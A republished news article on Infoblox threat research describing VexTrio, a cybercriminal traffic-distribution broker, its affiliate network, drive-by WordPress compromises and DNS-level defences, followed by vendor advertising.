Arabic Arabic Chinese (Simplified) Chinese (Simplified) Dutch Dutch English English French French German German Italian Italian Portuguese Portuguese Russian Russian Spanish Spanish
| (844) 627-8267

Cybercrime Central: VexTrio Operates Massive Criminal Affiliate Program | #cybercrime | #computerhacker

GUEST RESEARCH Infoblox has released new research unveiling a set of large-scale malicious cybercriminal partnerships led by insidious threat actor VexTrio. The partnerships involve a more than 60-strong underground affiliate network and are seeing high volumes of malware and other malicious content delivered to networks in Australia, New Zealand and across the globe.

Formed more than six years ago, VexTrio is now one of the world’s largest malicious networks targeting internet users today. It acts as a cybercriminal broker and operates traffic distribution systems (TDS) that route users based on their device, operating system, location, and other characteristics to malicious websites.

VexTrio has largely evaded detection and strengthened its resilience against internet service providers’ efforts to suspend its assets, all while building up a unique ‘partner program’.

“While cybercriminals are often portrayed as gangs of hackers or lone brilliant coders, more often they buy and sell goods and services as part of a larger criminal economy,” said Renée Burton, Head of Threat Intelligence at Infoblox and a former Senior Executive (DISL) with the U.S. National Security Agency (NSA).

“For example, some actors sell malware services, and malware-as-a-service (MaaS) allows buyers easy access to the infrastructure necessary to commit crimes. These service providers also form strategic partnerships, similar to the way legitimate companies do, in order to extend the limits of their current operations. Such relationships are forged in secret and may include a number of partners, making them difficult to untangle and understand from an outside perspective.”

Key findings from the report include:

  • VexTrio is the single most pervasive threats in Infoblox customers’ networks, active in more than 50 per cent of networks in just the last two years.
  • The threat actor acts as a broker of malicious traffic for more than 60 cybercriminal affiliates.
  • Partnerships tend to be longstanding and operate in a unique way, with VexTrio providing a number of dedicated servers to each affiliate.
  • Despite connecting millions of web users to malicious content for more than six years, VexTrio has largely evaded detection due to its successful business model that feeds on web traffic from its affiliates and has infrastructure built on compromised websites.
  • Two of its largest affiliates are ClearFake and SocGholish; malicious JavaScript frameworks that present website visitors with harmful content and inject malicious JavaScript into vulnerable websites, respectively. SocGholish is widely considered to be one of the top three global threats today.
  • VexTrio is a prolific domain name system (DNS) attacker and has more than 70,000 known malicious domains.

The most common attack method deployed by VexTrio and its affiliates is the ‘drive-by compromise’, where actors compromise vulnerable WordPress websites and inject malicious JavaScript into their HTML pages. This script typically contains a TDS that redirects victims to malicious infrastructure and gathers information such as their IP address. VexTrio also operates SMS scams where it sells victims’ phone numbers to other cybercriminals.

Screenshot 2024 01 26 095559

“Although difficult to identify and track, blocking VexTrio at the DNS level can disrupt and protect against a large spectrum of cybercriminal activity,” added Burton.

“This can be achieved through using tailored DNS signatures and statistical-based algorithms to identify VexTrio’s intermediary TDS servers and domains shortly after they’re registered. As Australian organisations look to raise their security posture in the wake of the new Cyber Security Strategy, it’s important to understand how DNS threat actors like VexTrio operate, particularly as more than 90 per cent of malware depends on DNS at some stage of its execution.”

The full report on VexTrio and its affiliate network can be found here.


You probably know that we are big believers in Network Detection and Response (NDR).

Did you realise that Gartner also recommends that security teams prioritise NDR solutions to enhance their detection and response?

Picking the right NDR for your team and process can sometimes be the biggest challenge.

If you want to try out a Network Detection and Response tool, why not start with the best?

Vectra Network Detection and Response is the industry’s most advanced AI-driven attack defence for identifying and stopping malicious tactics in your network without noise or the need for decryption.

Download the 2022 Gartner Market Guide for Network Detection and Response (NDR) for recommendations on how Network Detection and Response solutions can expand deeper into existing on-premises networks, and new cloud environments.



It’s all about Webinars.

Marketing budgets are now focused on Webinars combined with Lead Generation.

If you wish to promote a Webinar we recommend at least a 3 to 4 week campaign prior to your event.

The iTWire campaign will include extensive adverts on our News Site and prominent Newsletter promotion and Promotional News & Editorial. Plus a video interview of the key speaker on iTWire TV which will be used in Promotional Posts on the iTWire Home Page.

Now we are coming out of Lockdown iTWire will be focussed to assisting with your webinars and campaigns and assistance via part payments and extended terms, a Webinar Business Booster Pack and other supportive programs. We can also create your adverts and written content plus coordinate your video interview.

We look forward to discussing your campaign goals with you. Please click the button below.



Click Here For The Original Source.